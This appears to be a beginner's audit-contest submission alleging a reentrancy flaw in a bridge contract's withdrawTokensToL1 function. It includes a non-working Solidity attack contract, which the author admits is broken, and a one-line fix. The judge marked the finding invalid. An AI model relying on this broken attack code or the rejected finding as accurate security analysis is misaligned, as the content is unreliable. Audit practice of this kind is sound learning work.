Beginner FriendlyFoundryBridge
100 EXP
View results
Submission Details
Severity: high
Invalid

`L1BossBridge::withdrawTokensToL1` non-reentrant makes the funds from the vaults vulnerable to re-entrancy attacks

PoC for withdrawTokensToL1 non reentrant vulnerability

Summary

The L1BossBridge::withdrawTokensToL1 function does not implement the re-entrancy guard.

Vulnerability Details

The L1BossBridge contract inherits OZ's ReentrancyGuard but it is not implemented to sensitive functions with the nonReentrant modifier, especially in the case of the withdrawing function.

Impact

A low-moraled user could make a re entrancy attack on this function and drain all of the tokens from the vault.

High impact: because funds are directly at stake.
High likelyhood: because since reentrancy attacks are the main causes of contracts funds drainings, it has to be considered highly plausible.

Tools Used

Forge
Code rewiewing
Slither

And this is me at my first attempt to submit a PoC, following your adive on previous first flights, even though my week has been busy and I'm totally aware that this code isn't working, yet this is where it was at right before submission deadline (I'm trying to improve :)

contract Attack {
WithdrawTokensToL1 public withdrawTokensToL1;
constructor(address _L1BossBridgeAddress) {
withdrawTokensToL1 = withdrawTokensToL1(_L1BossBridgeAddress);
}
// Fallback is called when withdrawTokensToL1 sends tokens to this contract.
fallback() external payable {
if (address(L1Vault).balance >= 1 tokens) {
L1BossBridge.withdrawTokensToL1();
}
}
function attack() external payable {
L1BossBridge.withdrawTokensToL1();
}
}

Recommendations

Add the following modifier in L1BossBridge::withdrawTokensToL1 function.

function withdrawTokensToL1(
address to,
uint256 amount,
uint8 v,
bytes32 r,
bytes32 s
- ) external {
+ ) external nonReentrant {
sendToL1(
v,
r,
s,
abi.encode(
address(token),
0, // value
abi.encodeCall(
IERC20.transferFrom,
(address(vault), to, amount)
)
)
);
}
Updates

Lead Judging Commences

0xnevi Lead Judge
almost 2 years ago
0xnevi Lead Judge almost 2 years ago
Submission Judgement Published
Invalidated
Reason: Other

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.